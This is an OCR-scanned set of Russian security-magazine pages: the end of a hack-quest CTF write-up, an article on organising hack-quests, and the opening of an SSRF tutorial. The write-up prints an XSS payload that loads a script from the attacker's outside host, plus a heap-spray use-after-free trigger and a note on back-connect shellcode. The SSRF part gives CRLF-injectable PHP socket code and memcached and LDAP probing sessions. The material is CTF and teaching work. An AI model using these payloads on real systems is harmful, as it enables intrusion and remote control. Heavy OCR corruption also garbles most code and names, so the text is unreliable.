тз8 = (мсЬаг^і * ) та11ос(5І2ео-Р(мсИаг_1:) * 
(мс5Іеп(_іпри-С) + 1)); 

тетсру(тз8, _іпри-С, зІ 2 ео-Р(\л/сЬаг_' 1 :) * (мсз1еп(_іпри1:) 

+ 1 )); 

} 

ѴОІСІ сіаР1и§АРІ: гСЬескМеззаееО { 
і-р (тзе) і-Р (сосіе != N1)11) { 

сосіе - > сЬеск5і8п(сосІе - > сосіеі, сосіе - > сосІе2); 

} еізе { 

тетсру(тз8, Е "Сосіе по"Е -РоипсІ", 5І2ео-Р(мсЬаг_1:) * *-• 
(мс5Іеп(1 "Сосіе поі: -РоипсІ") + 1)); 

} 

} 

ѴОІСІ сіаР1и§АРІ: :Кезе1:() { 

■Ргее( сосіе); 

} 

Все эти функции являются реализациями методов плагина 
(АсІіѵеХ/МРАРІ плагина). Очевидно, что тут присутствует уязви- 
мость класса изе-а^іег-^гее (ну, еще есть сІоиЫе-^гее, но это не про- 
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Те самые блоки 



Спрятанный от глаз флаг на одном из блоков 

эксплуатируешь так легко). Если вызвать ІпііСосІеІ), затем РезеП), 
то сначала выделится память и проинициализируется 'объект' 
сосіе, а затем память пометится как свободная — (гее(сосіе). Тем 
не менее указатель сосіе сохранится, и если выполнить вызов 
СЬескМеззадеО, то дернется функция сЬескЗідпО, указатель на ко- 
торую хранится по указателю сосіе. Но так как память помечена 
как освобожденная, то она может быть перезаписана. Например, 
если перед вызовом СЬескМеззадеО вызвать Іпі!Меззаде() со стро- 
кой, размер которой равен размеру 'объекта' сосіе, то память 
для этой строки выделится ровно там, где до этого был наш 'объ- 
ект'. Это действие перезапишет указатель сосіе сЬескЭідп на то, 
что будет в строке, в итоге вызов СЬескМеззаде приведет к вызову 
по адресу с содержимым строки, то есть по перезаписанному, 
контролируемому атакующим указателю. Модуль скомпилирован 
без поддержки А51Р, а так как виртуалка на ѴігІиаІВох по умолча- 
нию не поддерживает ОЕР, то написать эксплойт очень легко, надо 
только просмотреть размер сосіе в ЮА или дебаггере (или угадать). 
Привожу код победителя — Дмитрия «ОагкВуІе» Москина. Х$5 
в поле пате: 

' ;зеТТітеоиТ(Сипс1;іоп(){еѵа1(ипе5саре(те55а§е))},100); ' 

Такой вариант был выбран потому, что в поле пате Х55 отруба- 
лось по длине, зато в поле теззаде (в котором Х55 не было, зато 
и ограничения по длине тоже) — нет. Таким образом, он загрузил 
в поле теззаде пейлоад с редиректом: 

ѵаг а=с1оситеп-1:.сгеа-1:еЕ1етепТ( 'зсгірі' ); 
а . зеТАТТгіЬиТеС ' зге ' , ' ЬТТр : //зпТ . сІагкЬуТе . ги/аТТаск . ЬТтІ ' ) ; 
сІоситепТ . Ьосіу . аррепсІСЬіІсІ(а) ; 
тз§.іппегНТМІ=' ' ; 

Тайм-аут был поставлен потому, что поле теззаде инициализи- 
руется позже, чем пате. На странице аІІаск.ЫтІ был простейший 



Граффити в 30 

сплоит ванильных времен — хипрспрей с ноп-следом и шелл- 
кодом, и собственно триггер уязвимости: 



ѵаг ас1с1г=ипе5саре("%и0с0с%и0с0с"); \\ 0х0с0с0с0с 

сіаР1и§іп . ІпіТСосІеСЗІЗЗ?) ; 
сіаРІибіп.КезеТО; 

сіаР1и§іп.ІпіТМе55а§е("1111" + асісіг + "000"); 
сіаР1и§іп.СЬескМе5за§е(); 

Шелл-код открывал бэк-коннект-шелл. Так что в итоге Дмитрий 
получил шелл на машине «агента», где, покопавшись в файловой 
системе, нашел флаг в текстовом файле. За самое быстрое нахож- 
дение всех флагов он получил приз от нас — Мокіа Іитіа 920. Так 
же, отдельное спасибо ему за фотографии с конкурса (все фотогра- 
фии к этому материалу предоставлены Дмитрием, а его впечатле- 
ния от прохождения конкурса можно прочитать в его блоге — 
ЫЫу/Ѵ2Ь9Р1 ). На втором месте оказался Андрей «еі-дгас1» Григо- 
рьев, который получил Мокіа Іитіа 820. 

(конШ 

Спасибо всем тем, кто принимал участие в данном конкурсе, 
особенно хочется выразить респект ребятам, которые писали дей- 
ствительно боевой РОР-сплоит с обходом ОЕР и просто не успели 
(они же не могли думать, что на ѴѴіпУ у нас нету ОЕР...). В ином 
случае победили бы они — такой вывод сделан по соотношению 
потраченного времени на каждое задание и по тому, на какой 
стадии кто из участников находился в каждый отдельно взятый 
момент. Увы, безопасность часто связана со случайностями, и если 
вы запускаете что-то под ѴігШаІВох, то может оказаться, что там 
не будет ОЕР, защита окажется ниже, и понадобится более простое 
решение — и это тоже ценный урок. Квест для вас готовили: Сергей 
Миронов, Ериан Надир, Алексей Синцов. □□ 
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Как мы делаем хак-квесіы 




ИСПОВЕДЬ аОИ5ЕС_ЬАВ 



ІМТРО 

Ты уже не раз (мы надеемся) участвовал 
в наших хак-квестах, приуроченных к началу 
двух крупнейших событий в области инфор- 
мационной безопасности, которые проходят 
в нашей стране, — форума РНОаув и конферен- 
ции 2егоМідЫ$. В этой статье мы расскажем, 
как организуются и создаются эти конкурсы, 
и постараемся дать ценные советы, которые 
помогут одержать победу. Прежде чем мы 
приступим, напоминаем: хак-квест — это раз- 
новидность Іазк-Ьазесі СТР, в котором наличие 
команды не принципиально. 

ОТКУДА НОГИ РАСТУТ^ 

Немного истории. Для меня ІШсІОгпрр) все нача- 
лось в 2010 году, когда мы вместе с Димой Ев- 
теевым и другими ребятами делали хак-квест 
для СС. По какому принципу тогда собрались 
организаторы, я не знаю (или уже не помню), 
но была создана гугл-группа, куда каждый 
отписывался о тех заданиях, которые хочет/ 
может сделать. Затем все задания собрались 
вместе на самом СС, и получился очень даже 
неплохой квест. Самое забавное мое задание 
было названо «помойкой»: легенда на сайте 
с заданием гласила, что после разработки 



сверхсекретного продукта вся документация 
была уничтожена. Участникам была предо- 
ставлена фотография урны, расположенной 
неподалеку от места проведения конференции. 
На фото был ЕХІР-тег с 6Р5-координатами, 
по которым предстояло эту урну найти. Внутри 
лежало множество бумаги, на некоторых 
листах были распечатанные исходники веб- 
приложения. Как оказалось, урну нашли только 
по фото, без оглядки на 6Р5. Никогда не забуду 
отзывы: «...но сходство следа от яблока с г...м 
на распечатках заметили многие». 

Затем ОМ$ес (в 2010 году он только на- 
бирал обороты) постепенно обзавелся новыми 
сотрудниками, которые были мотивированы 
забавными рассказами про первый опыт 
хак-квеста. Так к 2011 году у нас уже был свой 
простенький движок и море идей для новых 
заданий. Оставалось только найти повод. 

ПЕРВЫЙ БЛИН: 2ЕР0МІ6НТ5 2011 

И повод нашелся. Им стала первая междуна- 
родная конференция 2егоМідЬі5, проходившая 
в Питере 25 ноября. С организаторами мы были 
уже хорошо знакомы по Ое^соп Риззіа (ОС67812) 
поэтому без труда договорились о проведении 
хак-квеста и розыгрыше билетов. Про сами 



задания мы напишем ниже, а вот интерфейс за- 
служивает отдельных слов. Все задания распо- 
лагались на карте Санкт-Петербурга в опреде- 
ленных местах-достопримечательностях. Так, 
под тасками находились и Исаакиевский собор, 
и Троицкий, и Кировский завод, и многое- 
многое другое. На странице задания участник 
получал историческую справку по данной 
локации из Википедии и описание самого 
таска. Расчет был на то, что участники между- 
народной конференции немного узнают город, 
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в который отправятся слушать/читать доклады. 
Это был первый опыт для нас и первые отзывы, 
как положительные, так и отрицательные. 

В этом хак-квесте задание на реверс делали 
парни из Е5ЕТ, с которыми мы продолжили 
сотрудничество и дальше. Главное, что мы 
поняли, — не надо себе ни в чем отказывать. 
Хотели мы сделать задания на социнженерию 
и сделали их, не так ли? 

МЕЖДУ ПЕРВОЙ И ВТОРОЙ... 

Через полгода настало время для закрепления 
успеха. Пришла весна, а вместе с ней между- 
народный форум РНОауз. С организаторами мы 
договорились о конкурсе заранее, непосред- 
ственно во время 2М, поэтому к конкурсу тоже 
готовить свои весенние водные сани стали 
еще зимой. Карта, успешно показавшая себя 
в Питере, стала московской. Задания стали 
«кремлевскими» и «хакспейсовскими», таки- 
ми знакомыми и познавательными одновре- 
менно. В качестве призов все те же инвайты, 
в качестве участников все те же хакеры, 
стремящиеся получить билеты. Море драйва 
и еще более веселые задания. А благодаря 
крякмису от Саши Матросова и Жени Родионо- 
ва из Е5ЕТ получилось удовлетворить вкусы 
даже самых заядлых бинарщиков. Самым 
веселым, по мнению участников, было «крем- 
левское» задание, суть которого поражала 
простотой: выслать фото девушки, на котором 
виден красный бюстгальтер и листок бумаги 
с названием команды. Это был отличный повод 
как минимум встать из-за стола и оторваться 



от монитора. Самым трудным было выкинуть 
фейки и фотошопы, но эта задача просто 
решалась наличием в команде опытного фото- 
графа. О том, какие девушки бывают у хакеров, 
можешь судить сам по фотографиям. 

ТРЕТИЙ ПОДХОД 

Прошел ровно год с проведения первого 
хак-квеста, и настало время второго эпизода 
ЕегоМідЫз. В этот раз конференция прово- 
дилась в Москве, чем немало удивила и нас, 
и остальных участников. Тема с картой уже 
казалась избитой, и мы решили сделать что-то 
новенькое. Новеньким оказался интерфейс 
а-ля Могіоп Соттапсіег, на чистом ЭаѵаЗсгірІ, 
без единой картинки, со всеми подобающими 
хоткейсами и потрясающей 8-битной музыкой 
в фоне. Управлялся Оиезі Соттапсіег (так мы 
назвали эту мордочку) исключительно с по- 
мощью клавиатуры. Каждый квест представ- 
лял собой файл, запуск которого по кнопке 
<Еп1ег> открывал задание в новой вкладке 
браузера. Каждое задание было ассоцииро- 
вано со старой игрушкой, за отгадку названия 
которой давались дополнительные баллы. 
Приятно отметить, что это оказался самый по- 
пулярный наш конкурс, в нем приняли участие 
1387 уникальных ІР-адресов, и 104 участника 
смогли выполнить хотя бы одно задание. 

ИЗГОТОВЛЕНИЕ ЗАДАНИЙ! 

I ОТКУДА ДРОВИШКИ?^ 

Большинство наших заданий — из реальной 
жизни. Выполняя аудиты безопасности веб- 



приложений, за полгода (а именно столько 
между РНОауз и ЕегоМідЫз) мы накапливаем 
множество хороших методов эксплуатации 
различных уязвимостей. Лучшие техники 
попадают в основу заданий конкурсов. Не- 
которые задания основываются на новых 
уязвимостях или методах атак, опубликован- 
ных буквально на днях. Мы стараемся сделать 
участие в хак-квесте не только веселой 
и интересной игрой, но и полезным тренингом 
для профессиональных качеств. Ведь одно 
дело — читать исследовательскую работу 
по каким-нибудь атакам на генераторы слу- 
чайных чисел, и совсем другое — взламывать 
настоящую (пусть и специально подготовлен- 
ную) систему с их использованием. 

В составлении заданий есть и элемент 
случайности, нередко уже в процессе игры 
приходят какие-то мысли и быстро готовятся 
интересные таски. Для примера: в мае, во 
время прохождения РНОауз Ьаскдиезі, (іОіпрр 
читал доклад и лекцию в Германии. Эти собы- 
тия проходили в разных городах, между кото- 
рыми надо было ехать на поезде. Так родилось 
прекрасное задание по форензике, в котором 
участникам надо было по дампу ѴѴі-Рі-трафика 
восстановить время и станцию отправления 
поезда, а также время и станцию прибытия. 
Изначально было спланировано другое за- 
дание — встать рядом с каким-нибудь домом 
на улице тихого провинциального немецкого 
городка и записать 5-10 минут трафика в бес- 
проводном эфире. Затем попросить участников 
восстановить точный адрес (страна, город, 
улица, номер дома) этого места. Наблюдая, 
как быстро участники справились с такой 
статической геолокацией по В55Ю, мы сразу 
же одобрили идею второго задания с маршру- 
том поезда. Надо отметить, что для решения 
этой задачи необходимо было воспользоваться 
не только базой данных геолокации по В55Ю, 
но и действующим расписанием немецкой 
железной дороги. 

Есть также задания, предвосхищающие 
какие-то наши собственные наработки. Так, 
мы предложили провести Еггог-Ьазесі ХХЕ 
в мае, а в ноябре подготовили Б5РР-задание. 
Решая такие задания, участники получают 
уникальную возможность осознать материал, 
который только-только выходит с верстака 
исследователей в открытый доступ. 

ФАКАПЫ: НАМ НЕ СТЫДНОГ і 

Все врут. Все врут, и все косячат. Мы тоже 
допускали огрехи в хак-квестах и ничуть 
не стыдимся этого. Напротив, поощряем за об- 
наружение недокументированных уязвимо- 
стей. Когда готовился первый хак-квест, мы 
подошли к этому очень основательно — все 
функции были разбиты по отдельным вирту- 
альным машинам. Если задание предполагало 
выполнение кода, оно строго размещалось 
на отдельной машине. Ко второму заходу мы 
немного расслабились и допустили возмож- 
ность выполнения команд на той же машине, 
где располагались другие задания. Напрямую 
читать директорию и файлы с заданиями 
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ОТ пользователя, выполняющего команды, 
естественно, было нельзя. Но среди заданий 
была читалка файлов, которая позволяла чи- 
тать валидные картинки на сервере уже с дру- 
гими правами. В итоге, эксплуатируя обе эти 
уязвимости, ребята из Іееі Моге создали ріре 
через РСЕ, указывающий сначала на валидную 
картинку, а затем (при повторном обращении) 
на файл, который требовалось прочитать. РНР- 
код-читалка работал следующим образом: 

<?рИр 

і-р(беТіта§е5І2е($-Рпате)>0){ 
б1е_§е‘С_соп-1:еп1:5 ( $-Рпате) ; 

Тут две операции открытия файлов и нет 
проверки І5_^іІе. В итоге если в переменной 
^пате будет имя пайпа, то при первом его 
открытии мы пройдем проверку на картин- 
ку (пайп сначала ссылается на валидную 
картинку), а затем прочитаем содержимое 
любого файла, прав на который у нас хватит 
(при втором обращении пайп ссылается уже 
на целевой файл). Красивая атака и очень по- 
учительная для нас. Изначальный подход был 
правильный, надо было давать РСЕ-задание 
на отдельной виртуалке, как это было в пер- 
вый раз, но мы поленились. Ребята из Іееі 
Моге смогли так считать один или два флага, 
которые они не взяли к моменту обнаружения 
этой уязвимости, а мы посчитали, что такой на- 
грады будет уже достаточно, и не стали давали 
бонусных флагов, хотя стоило бы, наверное. 

иіулзы 

Такое состязание, как хак-квест, да и лю- 
бое другое хакерское состязание не может 
обойтись без каких-то ну уж очень забавных 
моментов. Мы и сами любим пошутить, осо- 
бенно когда замечаем усердное сканирование 
хостов с заданиями сканерами типа Асипеііх 



или ѴѴЗАР. На прошедшем недавно хак-квесте 
0x02 мы подшутили над товарищем с бра- 
зильским ІР, который с самого начала конкурса 
усердно ломал хост приема флагов. Через 18 
(!!!) часов мы сжалились над ним и начали 
выдавать в случайные НТТР-ответы на его 
запросы ошибки 501, которые содержали 
куски строк из этих самых запросов. Феерия 
продолжалась еще два дня, подключались 
различные сканеры, были опробованы какие- 
то мыслимые и немыслимые векторы атак, 
начиная от НРР и заканчивая непонятными 
шелл-кодами. Через трое суток он написал 
нам со скриншотами, что обнаружил инъек- 
цию, но не может ее использовать. Также сде- 
лал несколько странных предположений о том, 
почему он наблюдает такое поведение ;). 

[СОВЕТЫ игрокам! 

Не претендуем на справедливость этого раз- 
дела, но тем не менее надеемся, что данная 
информация будет полезна всем участникам 
хак-квестов и СТР. По опыту наблюдения 
за игроками во время соревнований (не только 
наших) хочется дать следующие рекоменда- 
ции: 

• если вы играете в одиночку, не зависайте 
большедвух-трех часов над одним задани- 
ем, когда понимаете, что пути к решению 

у вас еще нет. Если командой — смените 
человека, выполняющегозадание, если 
он в тупике; 

• оцените динамичностьобстановки со- 
ревнования, следите за новымизаданиями, 
выбирайте выгодные для себятаски; 

• обычностоимостьзаданий возрастает 

к приближению конца соревнований, сохра- 
ните силы и ресурсы на «последний рывок»; 

• стоимостьзаданий не всегда пропорцио- 
нальна их сложности. Смело беритесь за до- 
рогиезадания, напугайтесь, вполне может 
быть, что они не такие уж и трудные; 

• играйте до конца, если хотите победить. 



большой отрыв от соперников еще не гаран- 
тирует победы; 

• выбирайте стратегию под игру и свою 
команду, часто есть способы влиять на ход 
соревнования (например, голосоватьза за- 
дания, которые будут открыты), используйте 
их с умом; 

• никогда не сдавайтесь. В любых обстоятель- 
ствах есть возможность выиграть; 

• не задалбывайте организаторов :). Эти люди 
очень напряжены и загружены во время 
соревнований, подумайте десять раз перед 
отправкой письма, является ли ваш «самый 
критичный» реквесттаким уж необходи- 
мым? 

[ЦЕЛИ и мотивация! 

Если ты прочитал эту статью и у тебя остался 
вопрос о том, зачем мы все это делаем, значит 
мы плохо изложили материал :). Это фан — ве- 
селье и интерес, отличный способ приложения 
усилий и подготовки команды. В каком-то 
смысле такие хак-квесты для нас — это свое- 
образный тимбилдинг, имеющий при этом пря- 
мое отношение к профессиональной деятель- 
ности. Мы сами учимся уучастников многим 
вещам, например подходу к заданию и образу 
мышления. Также такие конкурсы нужны нам, 
чтобы не закостенеть в своем вебе, не бояться 
пробовать разные трюки и в конечном счете 
оставаться квалифицированными в нашем 
быстро меняющемся мире информационной 
безопасности. 

[заключение] 

Играйте и выигрывайте! Не бойтесь сильных 
команд, бойтесь собственной неуверенности, 
ведь именно она мешает вам получить недоста- 
ющие знания и отточить навыки, необходимые 
для победы. Мы от себя обещаем поднимать 
мотивацию как призовым фондом, так и новы- 
ми интересными и полезными для практики 
заданиями. До новых встреч на скор-борде! □□ 



082 



ХАКЕР 02/169/2013 



взлом 



(аОМ$ес_1аЬ ІІаЬйопзес.ги. ІаЬ.опзес.ги) 




ЧАСТЬ 1: 

ОСНОВЫ 



Вся информация предостав- 
лена исключительно в озна- 
комительных целях. 

Ни редакция, ни автор не 
несут ответственности 
за любой возможный вред, 
причиненный материалами 
данной статьи. 
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САГА О ЗЕКУЕВ-бШЕ 
КЕОВЕЗТ Е0В6ЕВѴ 
В ДВУХ ЧАСТЯХ 

Если ты еще не в теме — вливайся! Зегѵег-зісіе 
гедиезі ^огдегу атаки уже победили Яндекс, 
5АР, ѴѴогсіРгевв и еще много-много разно- 
образных проектов. В этой вводной статье мы 
постараемся изложить все доступные на на- 
стоящий момент основы этого типа атак и при- 
вести примеры их использования. Разумеется, 
будет и продолжение, и красивые эксплойты, 
но для начала надо понять базовые принципы. 



НЕ мышонок, НЕ ЛЯГУШКА,/ 

А НЕВЕДОМА ЗВЕРУШКА! 

Давай сразу определимся. 55РР — это не уязвимости! Ни новые, 
ни старые, ни какие-либо еще. Уязвимость — это свойство про- 
граммы, которое может привести к нарушению конфиденциально- 
сти или доступности информации. Не претендуя на достаточность 
вводимых определений (пользуясь случаем, передаем привет 
Андрею Петухову — самому педантичному и системному исследо- 
вателю всех времен и народов), но тем не менее: 55РР — это атака, 
то есть способ использования уязвимости/ей (да, для проведения 
атаки может потребоваться несколько различных уязвимостей, 
и они могут быть разных типов). Этот способ и зашит в аббревиа- 
туру: 5егѵег-$ісіе гедиеві ^огдегу — подделка запросов от имени 
сервера. Таким образом, под фразой «нашел 55РР» говорящий 
подразумевает (мы надеемся) следующее: нашел одну или не- 
сколько уязвимостей, которые позволяют подделывать запросы 
от имени сервера. Пожалуй, можно было бы на этом и закончить, 
но мы хотим еще немного повзрывать твой мозг. 

Есть такая штука, как 0Ш5Р Тор-10, к которой прибегают 
многие компании и исследователи для оценки и классификации 
чего ни попадя (передаем пламенный привет геѵѵагсі-программе 
Яндекса). Дело в том, что 0ѴѴА5Р Тор-10 — это классификация 
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55КР (Зегѵег 5ісІе Кедие5( Рогдегу) 




Схема атаки 55РР. ОС будет выбирает сетевые интерфейсы на основе ІР, 
поэтому можно отправлять данные на ІоорЬаск и во внутренние сети 

угроз. Не уязвимостей, не атак, а именно угроз (Ігеаі). Это еще 
одна, самая, на наш взгляд, аморфная сущность в мире терминов 
ИБ. Очевидно, 55РР может обеспечивать различные угрозы, в за- 
висимости от конкретной эксплуатации. На этом краткий экскурс 
в теорию окончен. Для классификации уязвимостей настоятельно 
рекомендуем пользоваться С\Л/Е (сѵѵе.тііге.огд і. 

[ПРИЧИНЫ 55РР. РАЗЛИЧНЫЕ уязвимости] 

Начнем сначала: наша (55РР) цель — научиться подделывать 
запросы от имени сервера. Запросы — это, разумеется, ТСР/ 
ІЮР-пакеты. Что мы можем в них подделывать? Отправитель 
фиксирован — это тот самый уязвимый сервер, в поправке на веб- 
приложения — веб-сервер или сервер приложений, может быть 
и сервер СУБД или любой другой сервер в рамках архитектуры 
проекта. Все, что может открыть сокет, может быть уязвимо к 55РР. 
Что мы можем подделать в пакете? Получателя (адрес и порт) и, 
разумеется, данные, то есть тело пакета. 

Теперь определимся с тем, как мы можем подделывать пакеты. 
Все уязвимости, которые известны на данный момент как обеспе- 
чивающие 55РР, можно разбить на следующие группы: 

• недостаточная фильтрация при записи данных в сокеты; 

• небезопасные сетевые библиотеки; 

• обработка форматов файлов со ссылками на внешние данные; 

• обработка протоколов со ссылками на внешние данные. 

Группы эти весьма условны и призваны скорее помочь в освое- 
нии всех возможных техник атак, чем классифицировать уязви- 
мости. Также отметим, что одну уязвимость иногда можно будет 
отнести к нескольким группам сразу. 

НЕДОСТАТОЧНАЯ ФИЛЬТРАЦИЯ Ц 
ПРИ ЗАПИСИ ДАННЫХ В СОКЕТЬі] 

Самый простой вариант. Приложение само открывает сокет по- 
средством встроенных функций (^зоскореп для РНР) и пишет туда 
данные, которые не проходят должную фильтрацию. В этом случае 
должна быть возможность влиять также на адрес получателя 
пакета, то есть хост и порт, куда будет открыт сокет, но для са- 
мой подделки запроса требуется хотя бы возможность влиять 
на данные. Рассмотрим пример с прошедшего недавно ^егоМідЫз 
Ьаскриезі: 

<?рНр 

$Ьо5-1: = '127.0.0.1*; 

$-Р=-Рзоскореп($Ііо5І:, 80) ; 




Эксплоит для обхода всевозможных Ра$(С61 5а!е_то(1е, ореп_Ьа$едіг, 
(1І5аЫе_ЩпсІІоп5 и прочего. И все это через один только !$оскорепЛ\л^гие 



■РриТ:5($-Р^ "бЕТ /іпсІех.рЬр?и5ег={$_Р05Т[ ’ Іо^іп' ]} 
НТТР/1.1\г\пН05-С: $Ьо5І:\г\п\г\п");//СКІР іпіесііоп 
$гезр = 

мЬі1е($5 = -Рбе-1:5($-Р)) 

$гезр.=$5; 

$гезр=5иЬ5‘^г($гезр,з'Сгро5($ге5Рл"\г\п\г\п"));//геасі Ьу «-• 
ЕОР, поТ Ьу Іеп^ІЬ ЬеаЬег 
?> 



Как видно, пользовательские данные попадают в тело НТТР- 
запроса без фильтрации разделителей пакетов ІСРІР). В резуль- 
тате атакующий может добавить в запрос произвольные НТТР- 
заголовки по своему усмотрению. Но это еще не все. Обращаясь 
к спецификации РРС (см. Кеер-АІіѵе), мы понимаем, что можем 
даже отправить несколько новых, уже полностью контролируемых 
нами НТТР-запросов и они также будут обработаны веб-сервером. 
Вывод первый — фильтруйте данные, которые хотите записать 
в сокет. 

[небезопасные сетевые библиотеі^ 

Называются также «ипза^е зегѵег-зісіе гесіігесі», например во вто- 
ром издании ѴѴАНН (\Л/еЬ Арріісаііоп Наскегз НапЬЬоок). На самом 
деле могут проявляться не только в редиректах. Такие уязвимости 
существуют в сетевых библиотеках, которые используют разра- 
ботчики, чтобы не реализовывать какой-то протокол на чистых со- 
кетах. Сетевые библиотеки существуют во всех средах разработки, 
есть также универсальные, такие как сОРІ. Главная отличительная 
черта библиотек — разбор СІРІ строки и выбор соответствующего 
протокола (в случае использования голых сокетов только тип со- 
единения может быть задан в ІІРІ хоста — ззі://, ипіх://, ибр:// и так 
далее, — а сам протокол реализовывает разработчик). Например, 
для ЬМр://1оса1Ьоз1, Йр://1оса1Ьоз1 и другие. Здесь стоит отметить 
отдельно схему ПІе://, которая позволяет получить доступ к ло- 
кальным файлам сервера, исполняющего код. Редкий разработчик 
задумается о том, что сетевая библиотека может читать также и ло- 
кальные файлы. Далее начинаются особенности уже в реализации 
конкретных протоколов, о которых мы поговорим ниже. 

ОБРАБОТКА СРПРМАТПНФАЙЛПН І 

СО ССЫЛКАМИ НА ВНЕШНИЕ данные! 

Наверное, ты уже не раз слышал про такие уязвимости, как ХХЕ 
(Х)Ч1 Ехіегпаі ЕпГіІу). Это особенность парсера Х)И1, заключающая- 
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55РР: великий и ужасный 



55РР: архитектура атак 



Сервер 
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запрос 
(4-й 
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Сервер 

приложений 




НТТР-запрос 



запрос 
с вектором 
атаки 



Различные варианты атак 55РР внутри инфраструктуры приложения. 



Формирование НИР 
ответа через 55РР 



СЕТЛтВНТТМІ.І 
Нокіоі 



оет/вивнттмі.і 



СЕТ/імсНТТР/І.І 

НоісІосаВюк 



мЬІ1«($* - <дв^8($0) 

$г«ар.>$8} 

$гс8р>8иЬ8Ъг($ге8р,8Ігро8($гстр,"\г\п\г МГШМ.І 2МОК 
\п”)); $дос “ П8Ѵ ООМОосшпепЪ( ) ; 

$дос->1оас1ХМЬ($гввр) ; 

•сЬо $с1ос->9«^1ап8ііЪвВуТ8дИая«( "гооі" )- ]]х/геоО 
>ІЪет( о ) ->по<1еѴа1ие; 




НТТР/І.І 200 ОК 



5!№авГ''" 



НТТВѴІ.І МЙСЖ 






Вот так можно отформатировать НТТР-ответы сервера в формат, пригодный для 
чтения логикой веб-приложения. 



ся В возможности подключения в тело документа внешних данных. 
Данные эти получаются по ссылкам, которые парсер обрабатывает 
с помощью какой-либо сетевой библиотеки. Про библиотеки и их 
проблемы мы уже говорили разделом выше. 

Но ХМІ далеко не единственный формат файлов, поддержива- 
ющий ссылки на внешние данные. Достоверно известно, что та- 
кие форматы, как ОрепО^^ісе, М5 ОНісе, а также РОР, тоже могут 
ссылаться на внешние сущности. 

ОБРАБОТКА протоколов! , 

:С0 ССЫЛКАМИ на внешние данныеі 

Веб-приложения — это всегда какая-то, пусть и небольшая инфра- 
структура. Элементы ее общаются между собой, используя свои 
протоколы. Типичным примером являются базы данных. Приложе- 
ние работает с базой по ее протоколу, а сами запросы отправляют- 
ся согласно 501-синтаксису. Так вот, влияя на данные внутри про- 
токолов обмена, можно дать приложению инструкцию к открытию 
сокета и записи туда каких-то данных, используя функционал этого 
самого приложения. 

В рассматриваемом случае СУБД это можно сделать через 
старые добрые 501-инъекции, вызвав определенные функции 501. 
Для Розідгез это будет, например, группа функций сіЬ_Ііпк*(). В ко- 
нечном счете опять-таки будет вызвана соответствующая сетевая 
библиотека. 

[ПРОТОКОЛЫ и Бмцббим'^ 

Итак, у нас есть возможность открыть сокет и что-то туда запи- 
сать. Для получения профита требуется теперь, чтобы это что-то 
было воспринято каким-то функционалом (слушающим сокет, 
разумеется) и выполнило нужные нам действия. В системе много 
разных сервисов, и найти интересный не так сложно. Другое 
дело — как заставить наши данные быть воспринятыми. Ведь 
у нас не всегда есть возможность (а на практике ее никогда нет) 
записывать произвольные данные в сокет по своему усмотрению. 
Обычно есть неподконтрольный нам первый кусочек данных 
(Ьеасіег), между которыми в пакет записываются наши данные. 
Здесь на помощь приходят техники зтиддііпд-протоколов — 
то есть возможность делать из доступного требуемые пакеты, ну 
или почти требуемые (битые, дефектные), если конечный сервис 
будет их обрабатывать. 

Прежде чем говорить об эксплуатации, рассмотрим две особен- 
ности сетевого взаимодействия и обработки пакетов как на сто- 
роне сервера, так и на стороне клиента (клиентом в случае 55РР 
является уязвимый сервер, а сервером — целевой сервер, такая 
вот чехарда). 



Нулевая особенность — разумеется, это авторизация, все трюки 
55РР направлены только на одно — использование для своих 
нужд сервисов с Ьозі-Ьазесі авторизацией. Вешая сервис на адрес 
127.0.0.1, никто не задумывается, что запрос злоумышленника мо- 
жет прийти как раз с этого 127.0.0.1. Поэтому и живет 55РР. На этом 
же попадаются и более крупные проекты, когда внутренняя сеть 
считается доверенной. 

Первая особенность — сетевое приложение не закрывает сокет 
при получении некорректного пакета. Наиболее распространено 
среди рІаіпЛехІ-протоколов, но встречаются и бинарные. 

Вторая особенность — уязвимое приложение (код програм- 
миста или сетевая библиотека) отправляет данные, не удосто- 
верившись, что сервер поддерживает тот протокол, по которому 
устанавливается соединение. 

С первого раза довольно сложно понять суть и смысл этих 
особенностей, поэтому приведем примеры. Для всех примеров 
будем использовать пеісаі — простую сетевую утилиту для рабо- 
ты с сокетами, запускается она командой пс. Обрати внимание, 
что при прослушивании сокета и отправке вывода в зісіоиі байты 
будут конвертироваться в соответствии с настройкой локали. 
Например, если в сокет запишут 0x08, то он будет воспринят уже 
в консольном режиме как Ьаскзрасе и байта перед этим симво- 
лом на экране не будет. Для того чтобы не обмануться, вывод пс 
следует записывать в файл, а затем читать его через Ьехсіиппр -С. 
Для отправки пакетов рІаіпДехІ-протоколов проще всего исполь- 
зовать утилиту Іеіпеі. 

Итак, первая особенность. Рассмотрим ее на примере популяр- 
ного сервиса по501 Іп-тетогу базы данных тетсасЬес). Без огра- 
ничения общности здесь может быть практически любой ріаіп/ 
Іехі-протокольный сервис, но теппсасЬес) уж очень распространен 
в веб-приложениях, чтобы обойти его стороной. 

~$ 1:е1пе^ ІосаІЬоз-Ь 11211 
Тгуіп§ ::1... 

Тгуіп§ 127.0.0.1. . . 

СоппесЬесІ 1:о ІосаІІіоз-С. 

Езсаре сііагас^ег із 

оіоіо-іпѵаісі 

ЕІ^КОК 

ѵегзіоп 

ѴЕР5ІОМ 1.4.5 

о1о1о1-опѵаі1сІ2 

ЕІ^КОК 

диіі 

Соппес1:іоп сіозесі Ьу -Рогеіеп Ііозі. 
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Как видно, при получении некорректных данных команд оіоіо- 
іпѵаіісі и оІоІоІ-іпѵаІі(і2 сокет не был закрыт. Закрыть его удалось 
только после отправки команды риіі. Здесь же видно, что нам 
удалось корректно работать с протоколов даже после отправки 
неверной команды, мы успешно выполнили команду ѵегзіоп после 
оіоіо-іпѵаіісі. 

Продемонстрируем вторую особенность, на этот раз уже 
на уровне сетевой библиотеки. Откроем порт 8000 на прослушку 
и выполним обращение на этот порт через протокол ЮАР, исполь- 
зуя две разные библиотеки: сОРІ и ІѴѴР. Сначала сІІРІ: 

~$ ПС -1 -ѵѵ -р 8000 > оиТ: & 

1і5-Ьепіп8 оп [апу] 8000 ... 

~$ сигі 1сІар://1оса1Ьо5‘С:8000/ааааа 
''С 

соппесИ Но [127.0.0.1] Нгот ІосаІЬозІ: [127.0.0.1] 47648 
саН оиН 1 Ьехсіитр -С 

00000000 30 0с 02 01 01 60 07 02 01 03 04 00 80 00 

I 

0000000Ѳ 

Как видим, в данных, которые отправил сервер, никаких байт 
0x61 из нашего ІІРІ нету. Библиотека, прежде чем что-то от- 
править, запросила стандартное приглашение и, так как наш пс 
не смог на него ответить должным образом, не стала больше по- 
сылать данные. 

Теперь попробуем ІѴѴР (на самом деле здесь он только обертка 
над ІіЬпеЫ(іар-регІ библиотекой): 

